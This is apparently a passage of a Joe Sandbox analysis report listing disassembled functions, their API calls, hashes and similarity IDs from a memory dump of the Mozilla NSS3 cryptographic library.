Part of subcall function 6C6A1560: EnterCriticalSection.KERNEL32(?,?,?,6C670844,?), ref: 6C6A158F
Part of subcall function 6C6A1560: PR_Unlock.NSS3(?,?,?,?,6C670844,?), ref: 6C6A15B2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: b4256934b1a81df0f31671c799b54010b8c6d9927f5b717cc7dd99fa5dae8639
Instruction ID: c73c720e395a00100922ccd4b5ebd6714f69580e21471cf4aa05a7fbd812be4f
Opcode Fuzzy Hash: b4256934b1a81df0f31671c799b54010b8c6d9927f5b717cc7dd99fa5dae8639
Instruction Fuzzy Hash: B2A1D1B1D00206ABEF109F64DC41BEEB7B4EF49308F144524E905A7712E732E959CBAA

Function 6C672C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(#?gl,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672C62
EnterCriticalSection.KERNEL32(0000001C,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672C76
PL_HashTableLookup.NSS3(00000000,?,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672C93

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23,?), ref: 6C672CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?,?,6C673F23), ref: 6C672CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?), ref: 6C672CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C66E477,?,?,?,00000001,00000000,?), ref: 6C672D4D
EnterCriticalSection.KERNEL32(?), ref: 6C672D61
PL_HashTableLookup.NSS3(?,?), ref: 6C672D71
PR_Unlock.NSS3(?), ref: 6C672D7E

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Strings

#?gl, xrefs: 6C672C43

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?gl
API String ID: 2446853827-3528240498
Opcode ID: 405cd4fe03c96939331ebee95d1cd3edca420f304c070ba4366a49c951f4120c
Instruction ID: 9ad7b14718b6e1c8ee91811fa165ace448525d4ee584b7cf5fde45cca95f9b67
Opcode Fuzzy Hash: 405cd4fe03c96939331ebee95d1cd3edca420f304c070ba4366a49c951f4120c
Instruction Fuzzy Hash: B351E5B5D00605EBDB109F24DC458AA77B8FF1A35CB148930ED1897B11EB31E964C7E9

Function 6C6CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CADB1

Part of subcall function 6C6ABE30: SECOID_FindOID_Util.NSS3(6C66311B,00000000,?,6C66311B,?), ref: 6C6ABE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6CADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6CAE08

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6CAE25
PL_FreeArenaPool.NSS3 ref: 6C6CAE63
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C6CAE4D

Part of subcall function 6C5D4C70: TlsGetValue.KERNEL32(?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4C97
Part of subcall function 6C5D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CB0
Part of subcall function 6C5D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CAE93
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C6CAECC
PL_FreeArenaPool.NSS3 ref: 6C6CAEDE
PL_FinishArenaPool.NSS3 ref: 6C6CAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CAEF5
PL_FinishArenaPool.NSS3 ref: 6C6CAF16

Strings

security, xrefs: 6C6CADEE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 61bff6b2bb6bf6a80249b080d97401dd5a9447dabf5a7986831d16c69e5a71cd
Instruction ID: 30b04a4a87e8a1d094b011f1db4aa56e5b106d5621c01bb42be3d72708355082
Opcode Fuzzy Hash: 61bff6b2bb6bf6a80249b080d97401dd5a9447dabf5a7986831d16c69e5a71cd
Instruction Fuzzy Hash: 43413AB1A04304A7E7205B18EC49BAB72B8EF4630CF140625E914A2F42F735DA1AC7DF

Function 6C76AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C719890: TlsGetValue.KERNEL32(?,?,?,6C7197EB), ref: 6C71989E

EnterCriticalSection.KERNEL32(?), ref: 6C76AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C76AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C76AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C76AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C76B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C76B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C76B070
PR_JoinThread.NSS3(?), ref: 6C76B07B
free.MOZGLUE(?), ref: 6C76B084
EnterCriticalSection.KERNEL32(?), ref: 6C76B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C76B0C4
PR_JoinThread.NSS3(?), ref: 6C76B0F3
free.MOZGLUE(?), ref: 6C76B0FC
PR_JoinThread.NSS3(?), ref: 6C76B137
free.MOZGLUE(?), ref: 6C76B140

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 21fd622904193fc153ff19e6334f295dae96a49c9dfabf141f1235502bf79b4f
Instruction ID: f9ddc9833ab67dbbcbe1a80a245148f32037fe0ed269237f433b6ae319585ef8
Opcode Fuzzy Hash: 21fd622904193fc153ff19e6334f295dae96a49c9dfabf141f1235502bf79b4f
Instruction Fuzzy Hash: 52916DB5900601DFCB04DF16C98494ABBF1FF8535872985A9E8195BF22E732FC46CB91

Function 6C672980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C659E71,?,?,6C66F03D), ref: 6C6729A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C659E71,?), ref: 6C6729B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C659E71,?,?,6C66F03D), ref: 6C6729E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C659E71,?), ref: 6C6729F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C659E71,?), ref: 6C672A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C659E71), ref: 6C672A13

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

PR_Unlock.NSS3(?), ref: 6C672A6A
TlsGetValue.KERNEL32 ref: 6C672A98
EnterCriticalSection.KERNEL32(?), ref: 6C672AAC
PL_HashTableLookup.NSS3(?,?), ref: 6C672ABC
PR_Unlock.NSS3(?), ref: 6C672AC9
TlsGetValue.KERNEL32 ref: 6C672B3D
EnterCriticalSection.KERNEL32(?), ref: 6C672B51
PL_HashTableLookup.NSS3(?,6C659E71), ref: 6C672B61
PR_Unlock.NSS3(?), ref: 6C672B6E

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: a2950fe8bc08f932a72a8db864ae672ecf5fc7b20441773e4c6c8d090b6ca388
Instruction ID: 299ef922f07bc059c8845268ab6d02404794ad5c263a7077d423a9d02569812e
Opcode Fuzzy Hash: a2950fe8bc08f932a72a8db864ae672ecf5fc7b20441773e4c6c8d090b6ca388
Instruction Fuzzy Hash: 35710676900204EBDF109F25DC4499A77B5FF06358B058964EC189BB12FB31E954CBE9

Function 6C668DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C668E22
EnterCriticalSection.KERNEL32(?), ref: 6C668E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C668E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C668E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C668E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C668EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C668EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C668EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C668F00
free.MOZGLUE(?), ref: 6C668F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C668F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C668F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C668F5B
PR_Unlock.NSS3(?), ref: 6C668F72
PR_Unlock.NSS3(?), ref: 6C668F82

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 3b53da0e8bc34380ef8e9afb662128bf22662be034f5b46d1021dc1c1b29343f
Instruction ID: 4ed5d4e1d00a07b72f3c5744550685c3ed520d2649cf699b35357d5168366f8a
Opcode Fuzzy Hash: 3b53da0e8bc34380ef8e9afb662128bf22662be034f5b46d1021dc1c1b29343f
Instruction Fuzzy Hash: 18510BB2D00215AFD7009F7ACC449AEB7B9EF5A358B144129EC089BF10E731ED4587E6

Function 6C68CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C68CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C68CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C68CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C68CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C68CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C68CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C68CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C68CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C68CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C68CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C68CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C68CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C68CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C68D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C68D021

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d1f651082c0f3a5d7c5d58c19e336fc211ff98c86a1f23ede3cf83dfc7696c3f
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: C5313071B9791127EF0D149B6C21F9E254A4B6630EF440039F90BE6BC0FA859A5702BD

Function 6C760FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C761000

Part of subcall function 6C719BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C641A48), ref: 6C719BB3
Part of subcall function 6C719BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C641A48), ref: 6C719BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C761016

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_Unlock.NSS3(?), ref: 6C761021

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C761046
PR_Unlock.NSS3(?), ref: 6C76106B
PR_Lock.NSS3 ref: 6C761079
PR_Unlock.NSS3 ref: 6C761096
free.MOZGLUE(?), ref: 6C7610A7
free.MOZGLUE(?), ref: 6C7610B4
PR_DestroyCondVar.NSS3(?), ref: 6C7610BF
PR_DestroyCondVar.NSS3(?), ref: 6C7610CA
PR_DestroyCondVar.NSS3(?), ref: 6C7610D5
PR_DestroyCondVar.NSS3(?), ref: 6C7610E0
PR_DestroyLock.NSS3(?), ref: 6C7610EB
free.MOZGLUE(?), ref: 6C761105

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: d5844f10117e651e206211e29e9981062243c96b94bfa0603b7885be07ad219d
Instruction ID: 0be9266e25295d986855f9001a957344754722453cf731bed1f07a0631cffab7
Opcode Fuzzy Hash: d5844f10117e651e206211e29e9981062243c96b94bfa0603b7885be07ad219d
Instruction Fuzzy Hash: 77316BB5900402BBDB019F15EE45A45BBB6FF02319B188130E80952F61E732F979EBDA

Function 6C69EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C69EE0B

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C69EEE1

Part of subcall function 6C691D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C691D7E
Part of subcall function 6C691D50: EnterCriticalSection.KERNEL32(?), ref: 6C691D8E
Part of subcall function 6C691D50: PR_Unlock.NSS3(?), ref: 6C691DD3

TlsGetValue.KERNEL32 ref: 6C69EE51
EnterCriticalSection.KERNEL32(?), ref: 6C69EE65
PR_Unlock.NSS3(?), ref: 6C69EEA2
free.MOZGLUE(?), ref: 6C69EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C69EED0
PR_Unlock.NSS3(?), ref: 6C69EF48
free.MOZGLUE(?), ref: 6C69EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C69EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C69EFA4
free.MOZGLUE(?), ref: 6C69EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C69F055
free.MOZGLUE(?), ref: 6C69F060

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 1b5c8277085b0aaf0e628a0e698ff6ad375d3f95282e3bb5168e4128c866f2c9
Instruction ID: 30126aafb8ff49667068a156bd3657370fcb8a055a26e1405f569689917ac487
Opcode Fuzzy Hash: 1b5c8277085b0aaf0e628a0e698ff6ad375d3f95282e3bb5168e4128c866f2c9
Instruction Fuzzy Hash: 3A8181B1A0020AABDF00DFA5DC45BEE7BB5BF09318F144025E909A3711E731E965CBA9

Function 6C664CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C664D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C664D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C664DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C664E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C664E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C664E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C664E85
DER_Encode_Util.NSS3(?,?,6C7B05A4,00000000), ref: 6C664EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C664F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C664F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C664F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C664F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C664F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C664FC8

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 587d08d26e206948ffbce55c6eb2a00cedd2dd8134fac1dd78fdb9d00cf67cff
Instruction ID: 2ac62ba7dff3fee9f7dd21be046cea95f236de9391d5fff346251b62a1ffedd7
Opcode Fuzzy Hash: 587d08d26e206948ffbce55c6eb2a00cedd2dd8134fac1dd78fdb9d00cf67cff
Instruction Fuzzy Hash: 2F81B371908301AFE701CF26D850BABB7E4ABC5348F148929F958DBA40E771E905CB9B

Function 6C698F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C699582), ref: 6C698F5B

Part of subcall function 6C6ABE30: SECOID_FindOID_Util.NSS3(6C66311B,00000000,?,6C66311B,?), ref: 6C6ABE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C698F6A

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
